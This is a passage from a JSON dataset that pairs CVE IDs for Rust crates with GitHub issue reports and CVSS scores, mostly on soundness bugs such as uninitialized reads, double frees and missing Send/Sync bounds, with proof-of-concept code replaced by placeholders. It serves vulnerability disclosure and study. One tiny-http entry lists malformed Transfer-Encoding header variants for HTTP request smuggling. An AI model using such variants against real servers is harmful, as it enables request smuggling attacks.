        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26305",
        "Issue_Url_old": "https://github.com/hrektts/cdr-rs/issues/10",
        "Issue_Url_new": "https://github.com/hrektts/cdr-rs/issues/10",
        "Repo_new": "hrektts/cdr-rs",
        "Issue_Created_At": "2021-01-02T22:58:43Z",
        "description": "Reading uninitialized memory can cause UB ( APITAG ). Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation ( APITAG ). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). Suggested Fix It is safe to zero initialize the newly allocated part of APITAG buffer before APITAG in order to prevent user provided Read from getting access to the old contents from the newly allocated heap memory. Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35905",
        "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2239",
        "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2239",
        "Repo_new": "rust-lang/futures-rs",
        "Issue_Created_At": "2020-10-23T08:54:50Z",
        "description": "APITAG APITAG bound is unsound. Hello, we have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior while scanning crates.io. URLTAG Description APITAG implementation for APITAG only considers variance on T, while APITAG dereferences to U. This can lead to data race in safe Rust code when a closure used in APITAG returns U that is unrelated to T. Demonstration Crate: futures Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG bf6b4f NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2021-28034",
        "Issue_Url_old": "https://github.com/thepowersgang/stack_dst-rs/issues/5",
        "Issue_Url_new": "https://github.com/thepowersgang/stack_dst-rs/issues/5",
        "Repo_new": "thepowersgang/stack_dst-rs",
        "Issue_Created_At": "2021-02-22T18:15:33Z",
        "description": "push_cloned may drop uninitialized or double free if clone panics.. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG function: URLTAG The APITAG function increases the length of the stack, but between the element being written and this increased length the APITAG function is called which can leave the stack in a longer state but missing an element. Here's a simple demonstration of this issue: ERRORTAG This outputs: CODETAG Notice that APITAG is printed twice, indicating a double free.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26955",
        "Issue_Url_old": "https://github.com/RustSec/advisory-db/issues/653",
        "Issue_Url_new": "https://github.com/rustsec/advisory-db/issues/653",
        "Repo_new": "rustsec/advisory-db",
        "Issue_Created_At": "2021-01-23T16:27:12Z",
        "description": "xcb is unsound and unmaintained. Following up from URLTAG the following issues are currently outstanding in the xcb crate: interpret some bytes coming from the NUMBERTAG server as any type you like: rtbo/rust xcb NUMBERTAG URLTAG Out of bounds read for sending bytes to the server: rtbo/rust xcb NUMBERTAG URLTAG a \"safe\" version of APITAG (with some limits on the types, but not enough): rtbo/rust xcb NUMBERTAG URLTAG The README states: > Maintainance request > > I've been very happy to work on this project, but I don't have the possibility anymore to maintain these bindings to the level the Rust community deserves. I can't spend as much time on it as I used to, and I'm not using neither Rust nor XCB anymore, so I clearly can't improve the bindings with the latest Rust features. Person with motivation and good knowledge of Rust and XCB may contact me per email.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26955",
        "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/78",
        "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/78",
        "Repo_new": "rust-x-bindings/rust-xcb",
        "Issue_Created_At": "2020-04-11T02:22:44Z",
        "description": "Make APITAG unsafe. ERRORTAG This is the code for APITAG . Safe functions should (almost?) always be safe, no matter their arguments. My suggested fix is to change it to ERRORTAG This signals to callers that they have to be careful when calling cast_event.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26955",
        "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/94",
        "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/94",
        "Repo_new": "rust-x-bindings/rust-xcb",
        "Issue_Created_At": "2020-12-21T20:51:55Z",
        "description": "Undefined behaviour in xproto::change_property. APITAG takes the arguments APITAG and a APITAG . The currently generated code ERRORTAG does not check for the case APITAG , so a user could do something like this: APITAG APITAG will assume to get NUMBERTAG bits of data in APITAG , but instead gets only NUMBERTAG bits. Reading the last NUMBERTAG bytes from APITAG would cause UB. Also it is not desirable to get types, that are bigger than format . We could make APITAG unsafe or APITAG in the case of APITAG . Another option would be to only allow APITAG , APITAG and APITAG , since other formats are not allowed by APITAG . ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26955",
        "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/95",
        "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/95",
        "Repo_new": "rust-x-bindings/rust-xcb",
        "Issue_Created_At": "2021-01-23T06:39:05Z",
        "description": "APITAG is unsound. The below is pure unsoundness. The caller can specify any type they like. How about bool or an enum? Or something with a pointer like Vec or String or APITAG for extra memory fun? Edit: To explain this some more: A bool is either NUMBERTAG or NUMBERTAG If a variable of type bool contains any other value, that's undefined behaviour aka \"that must not happen\". ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26955",
        "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/96",
        "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/96",
        "Repo_new": "rust-x-bindings/rust-xcb",
        "Issue_Created_At": "2021-01-23T09:10:43Z",
        "description": "Creates a string from unvalidated utf8. I have no words: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36469",
        "Issue_Url_old": "https://github.com/krl/appendix/issues/6",
        "Issue_Url_new": "https://github.com/krl/appendix/issues/6",
        "Repo_new": "krl/appendix",
        "Issue_Created_At": "2020-11-15T05:31:26Z",
        "description": "Index should have its Send and Sync traits be bounded.. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Index object implements the Send and Sync traits for all types: URLTAG This should likely be bounded when both K and V are Send and Sync respectively, otherwise it makes it possible to send an Index object across threads containing non Sendable types such as an Rc object or a Cell .",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-29934",
        "Issue_Url_old": "https://github.com/uutils/coreutils/issues/1729",
        "Issue_Url_new": "https://github.com/uutils/coreutils/issues/1729",
        "Repo_new": "uutils/coreutils",
        "Issue_Created_At": "2021-02-18T01:57:22Z",
        "description": "Read on uninitialized buffer may cause UB ('uu_od' crate). Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Feb NUMBERTAG there is not yet an ideal fix that works with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Rust RFC NUMBERTAG URLTAG Discussion in Rust Internals Forum URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28030",
        "Issue_Url_old": "https://github.com/bodoni/truetype/issues/11",
        "Issue_Url_new": "https://github.com/bodoni/truetype/issues/11",
        "Repo_new": "bodoni/truetype",
        "Issue_Created_At": "2021-02-17T20:07:48Z",
        "description": "Custom Read on uninitialized buffer may cause UB. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Feb NUMBERTAG there is not yet an ideal fix that works with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Rust RFC NUMBERTAG URLTAG Discussion in Rust Internals Forum URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27376",
        "Issue_Url_old": "https://github.com/smol-rs/nb-connect/issues/1",
        "Issue_Url_new": "https://github.com/smol-rs/nb-connect/issues/1",
        "Repo_new": "smol-rs/nb-connect",
        "Issue_Created_At": "2020-12-15T11:18:00Z",
        "description": "Invalid assumption of APITAG layout. This code assumes that Rust's APITAG are layout compatible with sockaddr : URLTAG This is not guaranteed by the standard library, see URLTAG for more details.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28031",
        "Issue_Url_old": "https://github.com/okready/scratchpad/issues/1",
        "Issue_Url_new": "https://github.com/okready/scratchpad/issues/1",
        "Repo_new": "okready/scratchpad",
        "Issue_Created_At": "2021-02-18T19:44:32Z",
        "description": "panic safety: double drop may happen in two functions. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Two functions allow double drop of an object upon panic: APITAG , APITAG . Both functions take user provided closure as parameter, and a double drop of an object happens upon panic inside the user provided closure. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of scratchpad . APITAG Detail APITAG APITAG struct Foo is dropped twice upon panic in user provided closure. ERRORTAG Output: ERRORTAG Tested Environment Crate: scratchpad Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35858",
        "Issue_Url_old": "https://github.com/danburkert/prost/issues/267",
        "Issue_Url_new": "https://github.com/danburkert/prost/issues/267",
        "Repo_new": "danburkert/prost",
        "Issue_Created_At": "2020-01-16T11:10:21Z",
        "description": "Stack overflow when parsing message. When parsing certain messages, the process aborts with a stack overflow. I made a reproducer URLTAG : ERRORTAG Potentially the data requests allocation of a buffer that's larger than the actually available data NUMBERTAG APITAG input data is not that large...) APITAG through FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29930",
        "Issue_Url_old": "https://github.com/ibabushkin/arenavec/issues/1",
        "Issue_Url_new": "https://github.com/ibabushkin/arenavec/issues/1",
        "Repo_new": "ibabushkin/arenavec",
        "Issue_Created_At": "2021-01-12T14:49:59Z",
        "description": "double free error may happen in NUMBERTAG functions. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG Drop uninitialized memory upon panic within APITAG . URLTAG APITAG double free upon panic within APITAG in line NUMBERTAG URLTAG APITAG double free upon panic within APITAG in line NUMBERTAG URLTAG Proof of Concept Example program below exhibits a double drop on the same object. ERRORTAG Program Output The message APITAG is printed twice, indicating the same object was dropped twice. ERRORTAG Suggested Fix APITAG : Move APITAG to after all writes are done. APITAG & APITAG : Move APITAG to before APITAG . Thank you for checking out this issue!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35892",
        "Issue_Url_old": "https://github.com/nathansizemore/simple-slab/issues/2",
        "Issue_Url_new": "https://github.com/nathansizemore/simple-slab/issues/2",
        "Repo_new": "nathansizemore/simple-slab",
        "Issue_Created_At": "2020-09-04T03:55:57Z",
        "description": "APITAG allows out of bound read and APITAG has off by one error. Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. URLTAG URLTAG Description APITAG does not perform the boundary checking, which leads to out of bound read access. APITAG copies an element from an invalid address due to off by one error, resulting in memory leakage and uninitialized memory drop. Demonstration Crate: simple slab Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36457",
        "Issue_Url_old": "https://github.com/vertexclique/lever/issues/15",
        "Issue_Url_new": "https://github.com/vertexclique/lever/issues/15",
        "Repo_new": "vertexclique/lever",
        "Issue_Created_At": "2020-11-10T16:44:10Z",
        "description": "APITAG should have bounds on its APITAG traits. Currently APITAG implements the APITAG traits unconditionally: URLTAG I think this should only be when APITAG and APITAG respectively. Otherwise, this makes it possible to send across types that aren't safe to use across threads such as Cell s. Here's a demonstration that causes a data race: ERRORTAG This outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36444",
        "Issue_Url_old": "https://github.com/google/rust-async-coap/issues/33",
        "Issue_Url_new": "https://github.com/google/rust-async-coap/issues/33",
        "Repo_new": "google/rust-async-coap",
        "Issue_Created_At": "2020-12-08T20:46:21Z",
        "description": "APITAG Send and Sync should have bounds on RC. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync so long as APITAG and APITAG . URLTAG However, this should also probably be bounded by APITAG and APITAG , otherwise it's possible to smuggle across non Send types across thread boundaries. Here's a proof of concept that segfaults safe rust code: ERRORTAG Output: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35884",
        "Issue_Url_old": "https://github.com/tiny-http/tiny-http/issues/173",
        "Issue_Url_new": "https://github.com/tiny-http/tiny-http/issues/173",
        "Repo_new": "tiny-http/tiny-http",
        "Issue_Created_At": "2020-06-16T11:17:22Z",
        "description": "HTTP Request Smuggling Hardening. Posting it here for community patches after talking with the maintainers privately. Issue: tiny http doesn't prevent Request Smuggling attacks (CE:TL,TL:TL) where a frontend proxy might allow/pass malformed Transfer Encoding headers but tiny http will normalise them Steps to Reproduce Use a vulnerable version of APITAG in the following setup ( URLTAG as a frontend Use an example framework such as Rouille (which uses tiny http) ( FILETAG as a backend Now send a request similar to the following ERRORTAG In the above example, the request is sent with the Transfer encoding header having extra spaces APITAG Encoding : chunked). This is in violation of RFC NUMBERTAG tiny http is normalizing the ERRORTAG header, hence we get the below reponse. ERRORTAG More variations of this exist: ` Transfer Encoding: \"chunked\" Transfer Encoding: chunked Transfer Encoding: 'chunked' Transfer Encoding: chunk Transfer Encoding: chunked\u000b Transfer Encoding: chunked\u007f Transfer Encoding:",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28306",
        "Issue_Url_old": "https://github.com/MoAlyousef/fltk-rs/issues/519",
        "Issue_Url_new": "https://github.com/fltk-rs/fltk-rs/issues/519",
        "Repo_new": "fltk-rs/fltk-rs",
        "Issue_Created_At": "2021-02-18T20:48:04Z",
        "description": "[BUG] APITAG causes segmentation fault. Setting the label type of a widget to APITAG causes segmentation fault. Here is code to reproduce: ERRORTAG Expected behavior I have no idea what Multi label type does, I was just experimenting. Meta info OS: Arch Linu NUMBERTAG FLTKL Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36205",
        "Issue_Url_old": "https://github.com/rtbo/rust-xcb/issues/93",
        "Issue_Url_new": "https://github.com/rtbo/rust-xcb/issues/93",
        "Repo_new": "rtbo/rust-xcb",
        "Issue_Created_At": "2020-12-10T19:35:59Z",
        "description": "Soundness issue with ERRORTAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that xcb exports the ERRORTAG struct publicly: URLTAG Since the struct and its fields are public, it can be created from safe Rust code which can potentially leading to use after frees and double frees. Maybe this struct should have a hidden constructor or be marked ERRORTAG ? Here's a proof of concept showing a use after free with this struct: ERRORTAG This outputs: CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36205",
        "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/93",
        "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/93",
        "Repo_new": "rust-x-bindings/rust-xcb",
        "Issue_Created_At": "2020-12-10T19:35:58Z",
        "description": "Soundness issue with ERRORTAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that xcb exports the ERRORTAG struct publicly: URLTAG Since the struct and its fields are public, it can be created from safe Rust code which can potentially leading to use after frees and double frees. Maybe this struct should have a hidden constructor or be marked ERRORTAG ? Here's a proof of concept showing a use after free with this struct: ERRORTAG This outputs: CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36210",
        "Issue_Url_old": "https://github.com/mersinvald/autorand-rs/issues/5",
        "Issue_Url_new": "https://github.com/mersinvald/autorand-rs/issues/5",
        "Repo_new": "mersinvald/autorand-rs",
        "Issue_Created_At": "2021-01-01T04:08:05Z",
        "description": "impl Random on arrays can lead to dropping uninitialized memory. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG can potentially panic (since Random is a public trait and users can implement it on custom types) and if it does, the partially initialized array is dropped. Thus APITAG can be invoked on uninitialized memory, leading to undefined behavior. Thank you for reviewing this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36211",
        "Issue_Url_old": "https://github.com/Devolutions/gfwx-rs/issues/7",
        "Issue_Url_new": "https://github.com/devolutions/gfwx-rs/issues/7",
        "Repo_new": "devolutions/gfwx-rs",
        "Issue_Created_At": "2020-12-08T07:10:42Z",
        "description": "APITAG needs bounds on its Send and Sync traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync for all types: URLTAG However, this should probably be bound by APITAG and APITAG respectively. I realize this is an image library and the T will likely be a numeric type but without these bounds its possible to create data races from safe rust code and cause memory safety issues. Here's a rather contrived example where an \"image\" is backed by Cells causing a segfault from safe rust code: ERRORTAG Output: APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-36442",
        "Issue_Url_old": "https://github.com/maciejhirsz/beef/issues/37",
        "Issue_Url_new": "https://github.com/maciejhirsz/beef/issues/37",
        "Repo_new": "maciejhirsz/beef",
        "Issue_Created_At": "2020-10-28T06:26:02Z",
        "description": "APITAG lacks a Sync bound on its Send trait allowing for data races. I think the impl for Send on Cow should be bounded by APITAG or Sync like it is for references URLTAG and the APITAG itself URLTAG . URLTAG Without this it's possible to create references to a non Sync object like Cell through the use of a borrowed Cow. For example, consider the following program (uses APITAG to make dealing with threads easier): ERRORTAG This produces the output: APITAG While this example is pretty benign, here's how it can lead to a null pointer dereference from safe rust code: APITAG APITAG to expand code snippet APITAG ERRORTAG APITAG This example produces: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35862",
        "Issue_Url_old": "https://github.com/myrrlyn/bitvec/issues/55",
        "Issue_Url_new": "https://github.com/ferrilab/bitvec/issues/55",
        "Repo_new": "ferrilab/bitvec",
        "Issue_Created_At": "2020-03-27T20:21:13Z",
        "description": "Possible issue shrinking APITAG First, thank you for bitvec . I found a strange problem (freeing of unallocated memory) when shrinking a APITAG to a APITAG , but I can reproduce it only on macos. I have a hunch the problem may not be in bitvec at all, but possibly in something Rust specific. Any guidance will be appreciated. I created a reproducible minimal testcase in kulp/bitvec debugging URLTAG . Github Actions shows failure on macos URLTAG , whereas Ubuntu succeeds URLTAG (the Windows job URLTAG tends to be canceled because it does not finish before macos fails). On my Mac OS NUMBERTAG machine, test failure (with bitvec NUMBERTAG looks like this : ERRORTAG A backtrace URLTAG from ERRORTAG shows APITAG occurring during APITAG . The dynamically nearest bitvec code is this : ERRORTAG I wrote FILETAG that demonstrates the problem exists URLTAG across a broad swathe of Rust versions and bitvec versions. All NUMBERTAG ersions of Rust from NUMBERTAG through NUMBERTAG and all NUMBERTAG ersions of bitvec from NUMBERTAG through NUMBERTAG and NUMBERTAG as well) demonstrate the issue. For the real code in which this issue was first discovered, my only workaround is to switch to Linux, which is possible for the short term but rather worrying. Do you think it plausible that this is a Rust compiler or library issue ? if so, can you suggest a plan of attack for chasing it down further, or reporting it elsewhere ?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36213",
        "Issue_Url_old": "https://github.com/rodrimati1992/abi_stable_crates/issues/44",
        "Issue_Url_new": "https://github.com/rodrimati1992/abi_stable_crates/issues/44",
        "Repo_new": "rodrimati1992/abi_stable_crates",
        "Issue_Created_At": "2020-12-21T06:39:13Z",
        "description": "Update unsound APITAG and APITAG Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. URLTAG URLTAG These two implementations are copy pasted from Rust's standard library, and unfortunately it turns out that std implementations were containing soundness bugs (rust lang/rust NUMBERTAG and rust lang/rust NUMBERTAG respectively). Could you check them and update the respective part of this crate?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36455",
        "Issue_Url_old": "https://github.com/BrokenLamp/slock-rs/issues/2",
        "Issue_Url_new": "https://github.com/brokenlamp/slock-rs/issues/2",
        "Repo_new": "brokenlamp/slock-rs",
        "Issue_Created_At": "2020-11-17T06:45:09Z",
        "description": "Slock APITAG allows sending non Send types across thread boundaries. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Slock implements Send and Sync for all types: URLTAG This should probably be bounded by APITAG just like the FILETAG , otherwise this allows sending non Send types across thread boundaries which may invoke undefined behavior. Here's an example of this in action with an Rc segfaulting safe Rust code. Built with APITAG with APITAG feature enabled: ERRORTAG This outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-45705",
        "Issue_Url_old": "https://github.com/Absolucy/nanorand-rs/issues/28",
        "Issue_Url_new": "https://github.com/absolucy/nanorand-rs/issues/28",
        "Repo_new": "absolucy/nanorand-rs",
        "Issue_Created_At": "2021-07-10T22:52:06Z",
        "description": "Aliased mutable references with APITAG . Due to the implementation of APITAG & APITAG , the following code is unsound: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36208",
        "Issue_Url_old": "https://github.com/oliver-giersch/conquer-once/issues/3",
        "Issue_Url_new": "https://github.com/oliver-giersch/conquer-once/issues/3",
        "Repo_new": "oliver-giersch/conquer-once",
        "Issue_Created_At": "2020-12-23T00:31:47Z",
        "description": "APITAG can send APITAG && Sync) objects across thread boundaries. Hello :crab: , we APITAG group APITAG gatech) found an undefined behavior issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Sync impl of APITAG By exploiting the fact that T has no Send bound, it is possible to make APITAG send a non Send object across thread boundaries. ERRORTAG Proof of Concept I prepared a small example that sends APITAG across thread boundaries using APITAG . ERRORTAG Suggested Fix Adding a Send bound to T as following will allow the compiler to revoke the example program above. ERRORTAG Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36456",
        "Issue_Url_old": "https://github.com/ratel-rust/toolshed/issues/12",
        "Issue_Url_new": "https://github.com/ratel-rust/toolshed/issues/12",
        "Repo_new": "ratel-rust/toolshed",
        "Issue_Created_At": "2020-11-15T07:17:28Z",
